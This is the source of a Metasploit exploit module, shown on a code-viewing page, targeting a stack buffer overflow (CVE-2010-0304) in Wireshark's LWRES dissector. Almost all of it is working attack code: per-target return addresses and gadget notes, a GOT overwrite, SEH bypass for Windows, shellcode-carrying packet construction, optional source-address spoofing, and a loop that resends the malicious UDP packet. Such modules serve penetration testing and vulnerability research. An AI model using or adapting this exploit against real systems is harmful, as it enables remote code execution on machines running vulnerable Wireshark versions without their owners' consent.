CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Udp9include Msf::Exploit::Remote::Seh10include Msf::Exploit::Capture1112def initialize(info = {})13super(update_info(info,14'Name' => 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',15'Description' => %q{16The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through171.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer18overflow. This bug found and reported by babi.1920This particular exploit targets the dissect_getaddrsbyname_request function. Several21other functions also contain potentially exploitable stack-based buffer overflows.2223The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents24exploitation via the return address on the stack. Sending a larger string allows25exploitation using the SEH bypass method. However, this packet will usually get26fragmented, which may cause additional complications.2728NOTE: The vulnerable code is reached only when the packet dissection is rendered.29If the packet is fragmented, all fragments must be captured and reassembled to30exploit this issue.3132This version loops, sending the packet every X seconds until the job is killed.33},34'Author' =>35[36'babi', # original discovery/exploit37'jduck', # ported from public exploit38'redsand' # windows target/testing39],40'License' => MSF_LICENSE,41'References' =>42[43[ 'CVE', '2010-0304' ],44[ 'OSVDB', '61987' ],45[ 'BID', '37985' ],46[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],47[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]48],49'DefaultOptions' =>50{51'EXITFUNC' => 'process',52},53'Privileged' => true, # at least capture privilege54'Payload' =>55{56'Space' => 512,57'BadChars' => "\x00",58'DisableNops' => true,59},60'DefaultTarget' => 4,61'Platform' => %w{ linux osx win },62'Targets' =>63[64[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',65# breakpoint: lwres.so + 0x2ce266{67'Arch' => ARCH_X86,68'Platform' => 'linux',69# conveniently, edx pointed at our string..70# and so, we write it to g_slist_append's GOT entry just before its called.71# pwnt.72#73# mov [ebx+0xc],edx / jmp 0x804fc40 -->74# mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append75#76'Ret' => 0x804fc85, # see above..77'RetOff' => 376,78'Readable' => 0x804fa04, # just anything79'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append80}81],82[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',83{84'Arch' => ARCH_X86,85'Platform' => 'linux',86# the method for tshark doesn't work, since there aren't any convenient87# pointers lying around (in reg/close on stack)88#89# since the wireshark bin has a jmp esp, we'll just use that method..90'Ret' => 0x818fce8, # jmp esp in wireshark bin91'RetOff' => 376,92'Readable' => 0x8066a40, # just any old readable addr (unused)93'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)94}95],9697[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',98{99'Arch' => ARCH_X64,100'Platform' => 'linux',101'Ret' => 0xfeedfed5deadbeef,102'RetOff' => 152,103}104],105106[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',107{108'Arch' => ARCH_X86,109'Platform' => 'osx',110'Ret' => 0xdeadbeef,111'RetOff' => 268,112}113],114115# The following target was tested against Windows XP SP3 and Windows Vista116[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',117{118'Arch' => ARCH_X86,119'Platform' => 'win',120# NOTE: due to the length of this packet, your mileage may vary.121'Ret' => 0x61B4121B,122# 0x655810b6 = pop/pop/ret in libpango123# 0x02A110B6 = pop/pop/ret in libgtk-w124# 0x03D710CC = pop/mov/pop/ret in packet125# 0x61B4121B = pop/pop/ret in pcre3126'RetOff' => 2128,127}128],129],130'DisclosureDate' => '2010-01-27',131# Set it to passive mode to background it.132'Stance' => Msf::Exploit::Stance::Passive))133134register_options([135Opt::RPORT(921),136Opt::RHOST("239.255.255.250"),137OptAddress.new( 'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),138OptInt.new( 'DELAY', [true, 'This option sets the delay between sent packets', 5])139])140141register_advanced_options([142OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ])143])144145deregister_options('FILTER','PCAPFILE')146end147148def exploit149check_pcaprub_loaded # Check first150151ret_offset = target['RetOff']152153# we have different techniques depending on the target154if (target == targets[0])155# debian tshark156str = make_nops(ret_offset - payload.encoded.length - 16)157str << payload.encoded158str << [target['GotAddr'] - 0xc].pack('V')159str << rand_text(4)160str << [target['Readable']].pack('V')161str << rand_text(4)162# ret is next163elsif (target == targets[1])164fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string165str = make_nops(ret_offset - fix_esp.length - payload.encoded.length)166str << fix_esp167str << payload.encoded168# jmp esp...169str << [target.ret].pack('V')170# jump back171distance = ret_offset + 4172str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string173elsif (target == targets[4])174# ugh, /GS and UDP length issues :-/175str = make_nops(ret_offset - payload.encoded.length)176str << payload.encoded177str << generate_seh_record(target.ret)178# jump back179distance = ret_offset + 8180str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string181else182# this is just a simple DoS payload183str = Rex::Text.pattern_create(ret_offset)184#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+6").encode_string185end186187# add return address188#XXX: this isn't working?189#str << Rex::Arch.pack_addr(target.arch, target.ret)190str << [target.ret].pack('V')191192# form the packet's payload!193sploit = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"194sploit << "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"195sploit << "\x00\x00\x00\x01"196sploit << [str.length].pack('n')197sploit << str198sploit << "\x00\x00"199200shost = datastore['SHOST']201if (shost)202print_status("Sending malformed LWRES packet (spoofed from #{shost})")203open_pcap204205p = PacketFu::UDPPacket.new206p.ip_saddr = datastore['SHOST'] || Rex::Socket.source_address(rhost)207p.ip_daddr = rhost208p.udp_sport = rand((2**16)-1024)+1024209p.udp_dport = datastore['RPORT'].to_i210p.payload = sploit211p.recalc212213while true214break if session_created? and datastore['ExitOnSession']215break unless capture_sendto(p, rhost)216select(nil,nil,nil,datastore['DELAY'])217end218219close_pcap220221handler222else223print_status("Sending malformed LWRES packet every #{datastore['DELAY']} seconds.")224225handler226227while true228break if session_created? and datastore['ExitOnSession']229connect_udp230udp_sock.put(sploit)231disconnect_udp232select(nil,nil,nil,datastore['DELAY'])233end234end235236end237end238239240